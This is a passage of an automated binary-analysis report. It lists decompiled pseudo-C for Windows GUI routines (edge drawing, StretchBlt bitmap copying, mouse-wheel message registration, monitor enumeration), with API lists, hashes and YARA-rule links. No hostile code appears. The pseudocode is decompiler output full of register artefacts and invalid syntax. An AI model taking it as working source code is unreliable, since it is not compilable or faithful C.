				void* _t166;
				intOrPtr* _t188;
				intOrPtr* _t191;
				void* _t200;
				intOrPtr _t207;
				signed int _t224;
				void* _t227;
				void* _t229;
				intOrPtr _t230;

				_t227 = _t229;
				_t230 = _t229 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_t115 = E0043CC2C(_v8);
					_push(_t115);
					L00406FC4();
					_v16 = _t115;
					_push(_t227);
					_push(0x43dcea);
					_push( *[fs:edx]);
					 *[fs:edx] = _t230;
					GetClientRect(E0043CC2C(_v8),  &_v32);
					GetWindowRect(E0043CC2C(_v8),  &_v48);
					MapWindowPoints(0, E0043CC2C(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t200 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t200 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t200 = _t200 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t224 = GetWindowLongA(E0043CC2C(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t200;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t200;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t200;
						}
						if((_t224 & 0x00200000) != 0) {
							_t191 =  *0x495998; // 0x496a9c
							_v48.right = _v48.right +  *((intOrPtr*)( *_t191))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t200;
						}
						if((_t224 & 0x00100000) != 0) {
							_t188 =  *0x495998; // 0x496a9c
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t188))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x47a978 + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x47a988 + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x47a998 + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x47a9a8 + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E0041FC84( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t207);
					 *[fs:eax] = _t207;
					_push(0x43dcf1);
					_push(_v16);
					_t166 = E0043CC2C(_v8);
					_push(_t166);
					L00407124();
					return _t166;
				} else {
					return  *((intOrPtr*)( *_v8 - 0x10))();
				}
			}



















                                                                        0x0043da85
                                                                        0x0043da87
                                                                        0x0043da8d
                                                                        0x0043da90
                                                                        0x0043da9d
                                                                        0x0043dab2
                                                                        0x0043dab7
                                                                        0x0043dab8
                                                                        0x0043dabd
                                                                        0x0043dac2
                                                                        0x0043dac3
                                                                        0x0043dac8
                                                                        0x0043dacb
                                                                        0x0043dadb
                                                                        0x0043daed
                                                                        0x0043db03
                                                                        0x0043db18
                                                                        0x0043db31
                                                                        0x0043db3c
                                                                        0x0043db3d
                                                                        0x0043db3e
                                                                        0x0043db3f
                                                                        0x0043db4f
                                                                        0x0043db5a
                                                                        0x0043db5b
                                                                        0x0043db5c
                                                                        0x0043db5d
                                                                        0x0043db68
                                                                        0x0043db6e
                                                                        0x0043db7a
                                                                        0x0043db7f
                                                                        0x0043db7f
                                                                        0x0043db8f
                                                                        0x0043db94
                                                                        0x0043db94
                                                                        0x0043dbaa
                                                                        0x0043dbb6
                                                                        0x0043dbb8
                                                                        0x0043dbb8
                                                                        0x0043dbc5
                                                                        0x0043dbc7
                                                                        0x0043dbc7
                                                                        0x0043dbd4
                                                                        0x0043dbd6
                                                                        0x0043dbd6
                                                                        0x0043dbdf
                                                                        0x0043dbe3
                                                                        0x0043dbec
                                                                        0x0043dbec
                                                                        0x0043dbf9
                                                                        0x0043dbfb
                                                                        0x0043dbfb
                                                                        0x0043dc04
                                                                        0x0043dc08
                                                                        0x0043dc11
                                                                        0x0043dc11
                                                                        0x0043dc71
                                                                        0x0043dc71
                                                                        0x0043dc8a
                                                                        0x0043dc95
                                                                        0x0043dc96
                                                                        0x0043dc97
                                                                        0x0043dc98
                                                                        0x0043dca9
                                                                        0x0043dcc5
                                                                        0x0043dccc
                                                                        0x0043dccf
                                                                        0x0043dcd2
                                                                        0x0043dcda
                                                                        0x0043dcde
                                                                        0x0043dce3
                                                                        0x0043dce4
                                                                        0x0043dce9
                                                                        0x0043dcf1
                                                                        0x0043dd02
                                                                        0x0043dd02

                                                                        APIs
                                                                        • 72E7B080.USER32(00000000), ref: 0043DAB8
                                                                        • GetClientRect.USER32 ref: 0043DADB
                                                                        • GetWindowRect.USER32 ref: 0043DAED
                                                                        • MapWindowPoints.USER32 ref: 0043DB03
                                                                        • OffsetRect.USER32(?,?,?), ref: 0043DB18
                                                                        • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 0043DB31
                                                                        • InflateRect.USER32(?,00000000,00000000), ref: 0043DB4F
                                                                        • GetWindowLongA.USER32 ref: 0043DBA5
                                                                        • DrawEdge.USER32(?,?,00000000,00000008), ref: 0043DC71
                                                                        • IntersectClipRect.GDI32(?,?,?,?,?), ref: 0043DC8A
                                                                        • OffsetRect.USER32(?,?,?), ref: 0043DCA9
                                                                        • FillRect.USER32 ref: 0043DCC5
                                                                        • 72E7B380.USER32(00000000,?,0043DCF1,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0043DCE4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                                                        • String ID:
                                                                        • API String ID: 156109915-0
                                                                        • Opcode ID: 18cc17be9f14d87cf749883569c99a34ad1c3fb8269440956ae4272b69828a85
                                                                        • Instruction ID: 7968770457f43ada0f31e19ad590de613830df88c21d9f0d7a04e4ea0399ff5a
                                                                        • Opcode Fuzzy Hash: 18cc17be9f14d87cf749883569c99a34ad1c3fb8269440956ae4272b69828a85
                                                                        • Instruction Fuzzy Hash: E4812871E00208AFDB01DBA8D985EEEB7F9AF09314F1540A6F518F7252C779AE44CB24
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041FEC0, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 224windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E0041FEC0(intOrPtr* __eax, intOrPtr* __ecx, int* __edx, intOrPtr _a4, int* _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				int _v16;
				int _v20;
				int _v24;
				long _v28;
				long _v32;
				struct HDC__* _v36;
				intOrPtr* _v40;
				void* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t116;
				void* _t124;
				struct HDC__* _t191;
				int* _t196;
				intOrPtr _t204;
				intOrPtr _t208;
				intOrPtr _t209;
				intOrPtr _t210;
				int _t216;
				int* _t218;
				void* _t221;
				void* _t223;
				intOrPtr _t224;

				_t198 = __ecx;
				_t221 = _t223;
				_t224 = _t223 + 0xffffffd8;
				_v12 = __ecx;
				_t218 = __edx;
				_v8 = __eax;
				_t196 = _a8;
				if(_v12 != 0) {
					E00420398(_v8);
					 *[fs:eax] = _t224;
					 *((intOrPtr*)( *_v8 + 0x10))( *[fs:eax], 0x420166, _t221);
					_t204 =  *0x420178; // 0x9
					E00420804(_v8, __ecx, _t204);
					E00420398(E00424894(_v12));
					_push(_t221);
					_push(0x420141);
					_push( *[fs:eax]);
					 *[fs:eax] = _t224;
					_v20 = _t218[2] -  *_t218;
					_v24 = _t218[3] - _t218[1];
					_t216 = _t196[2] -  *_t196;
					_v16 = _t196[3] - _t196[1];
					if(E00424980(_v12, _t198) != _a4) {
						_v40 = E004242CC(1);
						_t198 =  *_v40;
						 *((intOrPtr*)( *_v40 + 8))();
						E00424AF4(_v40, _a4, __eflags);
						_t116 = E00424894(_v40);
						_t208 =  *0x42017c; // 0x1
						E00420804(_t116,  *_v40, _t208);
						_v36 =  *((intOrPtr*)(E00424894(_v40) + 4));
						__eflags = 0;
						_v44 = 0;
					} else {
						_v40 = 0;
						_t191 =  *((intOrPtr*)( *_v12 + 0x68))();
						_v44 = _t191;
						_push(0);
						L00406AE4();
						_v36 = _t191;
						_v44 = SelectObject(_v36, _v44);
					}
					_push(_t221);
					_push(0x42011f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t224;
					_t124 = E00424894(_v12);
					_t209 =  *0x42017c; // 0x1
					E00420804(_t124, _t198, _t209);
					if(E0041FD64( *((intOrPtr*)(_v8 + 0x14))) != 1) {
						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24,  *(E00424894(_v12) + 4),  *_t196, _t196[1], _t216, _v16, 0xcc0020);
						_v32 = SetTextColor( *(_v8 + 4), 0);
						_v28 = SetBkColor( *(_v8 + 4), 0xffffff);
						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24, _v36,  *_t196, _t196[1], _t216, _v16, 0xe20746);
						SetTextColor( *(_v8 + 4), _v32);
						SetBkColor( *(_v8 + 4), _v28);
					} else {
						E00420CCC( *(_v8 + 4), _t196, _t218[1],  *_t218, _t216, _t218, _t196[1],  *_t196, _v36, _v16, _t216, _t196[1],  *_t196,  *(E00424894(_v12) + 4), _v24, _v20);
					}
					_pop(_t210);
					 *[fs:eax] = _t210;
					_push(E00420126);
					if(_v40 == 0) {
						__eflags = _v44;
						if(_v44 != 0) {
							SelectObject(_v36, _v44);
						}
						return DeleteDC(_v36);
					} else {
						return E004035DC(_v40);
					}
				}
				return __eax;
			}






























                                                                        0x0041fec0
                                                                        0x0041fec1
                                                                        0x0041fec3
                                                                        0x0041fec9
                                                                        0x0041fecc
                                                                        0x0041fece
                                                                        0x0041fed1
                                                                        0x0041fed8
                                                                        0x0041fee1
                                                                        0x0041fef1
                                                                        0x0041fef9
                                                                        0x0041fefc
                                                                        0x0041ff05
                                                                        0x0041ff12
                                                                        0x0041ff19
                                                                        0x0041ff1a
                                                                        0x0041ff1f
                                                                        0x0041ff22
                                                                        0x0041ff2a
                                                                        0x0041ff33
                                                                        0x0041ff39
                                                                        0x0041ff41
                                                                        0x0041ff4f
                                                                        0x0041ff89
                                                                        0x0041ff92
                                                                        0x0041ff94
                                                                        0x0041ff9d
                                                                        0x0041ffa5
                                                                        0x0041ffaa
                                                                        0x0041ffb0
                                                                        0x0041ffc0
                                                                        0x0041ffc3
                                                                        0x0041ffc5
                                                                        0x0041ff51
                                                                        0x0041ff53
                                                                        0x0041ff5b
                                                                        0x0041ff5e
                                                                        0x0041ff61
                                                                        0x0041ff63
                                                                        0x0041ff68
                                                                        0x0041ff78
                                                                        0x0041ff78
                                                                        0x0041ffca
                                                                        0x0041ffcb
                                                                        0x0041ffd0
                                                                        0x0041ffd3
                                                                        0x0041ffd9
                                                                        0x0041ffde
                                                                        0x0041ffe4
                                                                        0x0041fff6
                                                                        0x0042006b
                                                                        0x0042007e
                                                                        0x00420092
                                                                        0x004200c0
                                                                        0x004200d0
                                                                        0x004200e0
                                                                        0x0041fff8
                                                                        0x0042002e
                                                                        0x0042002e
                                                                        0x004200e7
                                                                        0x004200ea
                                                                        0x004200ed
                                                                        0x004200f6
                                                                        0x00420102
                                                                        0x00420106
                                                                        0x00420110
                                                                        0x00420110
                                                                        0x00000000
                                                                        0x004200f8
                                                                        0x00000000
                                                                        0x004200fb
                                                                        0x004200f6
                                                                        0x00420173

                                                                        APIs
                                                                          • Part of subcall function 00420398: RtlEnterCriticalSection.KERNEL32(00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203A0
                                                                          • Part of subcall function 00420398: RtlLeaveCriticalSection.KERNEL32(00496A5C,00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203AD
                                                                          • Part of subcall function 00420398: RtlEnterCriticalSection.KERNEL32(00000038,00496A5C,00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203B6
                                                                        • 72E7A590.GDI32(00000000), ref: 0041FF63
                                                                        • SelectObject.GDI32(?,?), ref: 0041FF73
                                                                        • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00CC0020), ref: 0042006B
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00420079
                                                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 0042008D
                                                                        • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00E20746), ref: 004200C0
                                                                        • SetTextColor.GDI32(?,?), ref: 004200D0
                                                                        • SetBkColor.GDI32(?,?), ref: 004200E0
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420110
                                                                        • DeleteDC.GDI32(?), ref: 00420119
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Color$CriticalSection$EnterObjectSelectStretchText$A590DeleteLeave
                                                                        • String ID: DA
                                                                        • API String ID: 2975480410-2080325668
                                                                        • Opcode ID: a305b6964adfa08e3166ec0bdd060209ec18989792a7513b38a99bc9b876a6e0
                                                                        • Instruction ID: 352f120f49c7ce31c8e928e488b0f771bd528acb35d7a7b452884ca02f7a62cb
                                                                        • Opcode Fuzzy Hash: a305b6964adfa08e3166ec0bdd060209ec18989792a7513b38a99bc9b876a6e0
                                                                        • Instruction Fuzzy Hash: 6791B775A00118AFCB50EFA9D985D9EB7F8EF0D304B5584AAF508E7352C635ED40CB28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00407374, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryclipboardwindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00407374(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}








                                                                        0x0040737b
                                                                        0x0040737d
                                                                        0x0040737f
                                                                        0x00407391
                                                                        0x004073a0
                                                                        0x004073ac
                                                                        0x004073b8
                                                                        0x004073bd
                                                                        0x004073dc
                                                                        0x004073c3
                                                                        0x004073d3
                                                                        0x004073d3
                                                                        0x004073e1
                                                                        0x004073fe
                                                                        0x004073e7
                                                                        0x004073f7
                                                                        0x004073f7
                                                                        0x0040740b

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                                        • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                        • API String ID: 1416857345-3736581797
                                                                        • Opcode ID: 33887b9800c1c8701772067904d4d890eaa0bc031dc26d9606312377edf2b903
                                                                        • Instruction ID: 351a13b39c766bd10c055905373aadfc2257e8037effc2ac2d33f24fba4f34ad
                                                                        • Opcode Fuzzy Hash: 33887b9800c1c8701772067904d4d890eaa0bc031dc26d9606312377edf2b903
                                                                        • Instruction Fuzzy Hash: E1118270A08345AFE700AF65CC82B26B798EF45750F204476BD44AF3C1D6B86C41D76A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004277C4, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E004277C4(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x496acb != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x496ab8 = E00427218(7, _t60,  *0x496ab8, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}















                                                                        0x004277cd
                                                                        0x004277d0
                                                                        0x004277da
                                                                        0x0042780a
                                                                        0x00427810
                                                                        0x004278cc
                                                                        0x004278d4
                                                                        0x004278d4
                                                                        0x00427818
                                                                        0x0042781d
                                                                        0x00427828
                                                                        0x00427833
                                                                        0x00427838
                                                                        0x004278a1
                                                                        0x004278b9
                                                                        0x004278ca
                                                                        0x004278b5
                                                                        0x004278b5
                                                                        0x004278b5
                                                                        0x00000000
                                                                        0x004278a1
                                                                        0x00427844
                                                                        0x00427853
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00427865
                                                                        0x0042787d
                                                                        0x00427893
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00427899
                                                                        0x0042789b
                                                                        0x0042789b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042787d
                                                                        0x004277ee
                                                                        0x00427803
                                                                        0x00000000

                                                                        APIs
                                                                        • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004277FD
                                                                        • GetSystemMetrics.USER32 ref: 00427822
                                                                        • GetSystemMetrics.USER32 ref: 0042782D
                                                                        • GetClipBox.GDI32(?,?), ref: 0042783F
                                                                        • GetDCOrgEx.GDI32(?,?), ref: 0042784C
                                                                        • OffsetRect.USER32(?,?,?), ref: 00427865
                                                                        • IntersectRect.USER32 ref: 00427876
                                                                        • IntersectRect.USER32 ref: 0042788C
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                        • String ID: EnumDisplayMonitors
                                                                        • API String ID: 362875416-2491903729
                                                                        • Opcode ID: 509b17f4ff89f3f09313d7059f80117b772472ac54dbac4944b464566a9d4247
                                                                        • Instruction ID: 95e6c646e184b3413f1b03aee9d1c08cd6eaa1e6872ea2d6174b8da1ddef65f3
                                                                        • Opcode Fuzzy Hash: 509b17f4ff89f3f09313d7059f80117b772472ac54dbac4944b464566a9d4247
                                                                        • Instruction Fuzzy Hash: 5D311E72E0421AAFDB10DFA5DC44AEF77BCAF05314F408537F915E2241E6389905CBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004245C2, Relevance: 16.7, APIs: 11, Instructions: 165windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E004245C2(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				intOrPtr _t74;
				struct HDC__* _t76;
				signed int _t78;
				signed int _t79;
				char _t80;
				void* _t87;
				struct HDC__* _t110;
				void* _t131;
				struct HDC__* _t155;
				intOrPtr* _t159;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t175;
				int* _t179;
				intOrPtr _t181;
				void* _t183;
				void* _t184;
				intOrPtr _t185;

				_t160 = __ecx;
				_t183 = _t184;
				_t185 = _t184 + 0xffffffe4;
				_t179 = __ecx;
				_v8 = __edx;
				_t159 = __eax;
				_t181 =  *((intOrPtr*)(__eax + 0x28));
				_t167 =  *0x424810; // 0xf
				E00420804(_v8, __ecx, _t167);
				E00424C34(_t159);
				_v12 = 0;
				_v13 = 0;
				_t74 =  *((intOrPtr*)(_t181 + 0x10));
				if(_t74 != 0) {
					_push(0xffffffff);
					_push(_t74);
					_t155 =  *(_v8 + 4);
					_push(_t155);
					L00406C5C();
					_v12 = _t155;
					_push( *(_v8 + 4));
					L00406C2C();
					_v13 = 1;
				}
				_push(0xc);
				_t76 =  *(_v8 + 4);
				_push(_t76);
				L00406B8C();
				_push(_t76);
				_push(0xe);
				_t78 =  *(_v8 + 4);
				L00406B8C();
				_t168 = _t78;
				_t79 = _t168 * _t78;
				if(_t79 > 8) {
					L5:
					_t80 = 0;
				} else {
					_t160 =  *(_t181 + 0x28) & 0x0000ffff;
					if(_t79 < ( *(_t181 + 0x2a) & 0x0000ffff) * ( *(_t181 + 0x28) & 0x0000ffff)) {
						_t80 = 1;
					} else {
						goto L5;
					}
				}
				if(_t80 == 0) {
					if(E00424950(_t159) == 0) {
						SetStretchBltMode(E00420730(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t183);
				_push(0x424801);
				_push( *[fs:eax]);
				 *[fs:eax] = _t185;
				if( *((intOrPtr*)( *_t159 + 0x28))() != 0) {
					E00424BD4(_t159, _t160);
				}
				_t87 = E00424894(_t159);
				_t171 =  *0x424810; // 0xf
				E00420804(_t87, _t160, _t171);
				if( *((intOrPtr*)( *_t159 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t179, _t179[1], _t179[2] -  *_t179, _t179[3] - _t179[1],  *(E00424894(_t159) + 4), 0, 0,  *(_t181 + 0x1c),  *(_t181 + 0x20),  *(_v8 + 0x20));
					_pop(_t173);
					 *[fs:eax] = _t173;
					_push(E00424808);
					if(_v13 != 0) {
						_push(0xffffffff);
						_push(_v12);
						_t110 =  *(_v8 + 4);
						_push(_t110);
						L00406C5C();
						return _t110;
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t183);
					_push(0x424796);
					_push( *[fs:eax]);
					 *[fs:eax] = _t185;
					L00406AE4();
					_v28 = E00420B28(0);
					_v32 = SelectObject(_v28,  *(_t181 + 0xc));
					E00420CCC( *(_v8 + 4), _t159, _t179[1],  *_t179, _t179, _t181, 0, 0, _v28,  *(_t181 + 0x20),  *(_t181 + 0x1c), 0, 0,  *(E00424894(_t159) + 4), _t179[3] - _t179[1], _t179[2] -  *_t179);
					_t131 = 0;
					_t175 = 0;
					 *[fs:eax] = _t175;
					_push(0x4247db);
					if(_v32 != 0) {
						_t131 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t131;
				}
			}





























                                                                        0x004245c2
                                                                        0x004245c5
                                                                        0x004245c7
                                                                        0x004245cd
                                                                        0x004245cf
                                                                        0x004245d2
                                                                        0x004245d4
                                                                        0x004245d7
                                                                        0x004245e0
                                                                        0x004245e7
                                                                        0x004245ee
                                                                        0x004245f1
                                                                        0x004245f5
                                                                        0x004245fa
                                                                        0x004245fc
                                                                        0x004245fe
                                                                        0x00424602
                                                                        0x00424605
                                                                        0x00424606
                                                                        0x0042460b
                                                                        0x00424614
                                                                        0x00424615
                                                                        0x0042461a
                                                                        0x0042461a
                                                                        0x0042461e
                                                                        0x00424623
                                                                        0x00424626
                                                                        0x00424627
                                                                        0x0042462c
                                                                        0x0042462d
                                                                        0x00424632
                                                                        0x00424636
                                                                        0x0042463b
                                                                        0x0042463f
                                                                        0x00424644
                                                                        0x00424655
                                                                        0x00424655
                                                                        0x00424646
                                                                        0x0042464a
                                                                        0x00424653
                                                                        0x00424659
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00424653
                                                                        0x0042465d
                                                                        0x004246a0
                                                                        0x004246ad
                                                                        0x004246ad
                                                                        0x0042465f
                                                                        0x0042466a
                                                                        0x00424678
                                                                        0x00424690
                                                                        0x00424690
                                                                        0x004246b4
                                                                        0x004246b5
                                                                        0x004246ba
                                                                        0x004246bd
                                                                        0x004246c9
                                                                        0x004246cd
                                                                        0x004246cd
                                                                        0x004246d4
                                                                        0x004246d9
                                                                        0x004246df
                                                                        0x004246ed
                                                                        0x004247d6
                                                                        0x004247dd
                                                                        0x004247e0
                                                                        0x004247e3
                                                                        0x004247ec
                                                                        0x004247ee
                                                                        0x004247f3
                                                                        0x004247f7
                                                                        0x004247fa
                                                                        0x004247fb
                                                                        0x00000000
                                                                        0x004247fb
                                                                        0x00424800
                                                                        0x004246f3
                                                                        0x004246f5
                                                                        0x004246fa
                                                                        0x004246ff
                                                                        0x00424700
                                                                        0x00424705
                                                                        0x00424708
                                                                        0x0042470d
                                                                        0x00424717
                                                                        0x00424727
                                                                        0x00424761
                                                                        0x00424766
                                                                        0x00424768
                                                                        0x0042476b
                                                                        0x0042476e
                                                                        0x00424777
                                                                        0x00424781
                                                                        0x00424781
                                                                        0x0042478a
                                                                        0x00000000
                                                                        0x00424790
                                                                        0x00424795
                                                                        0x00424795

                                                                        APIs
                                                                          • Part of subcall function 00424C34: 72E7AC50.USER32(00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424C8A
                                                                          • Part of subcall function 00424C34: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424C9F
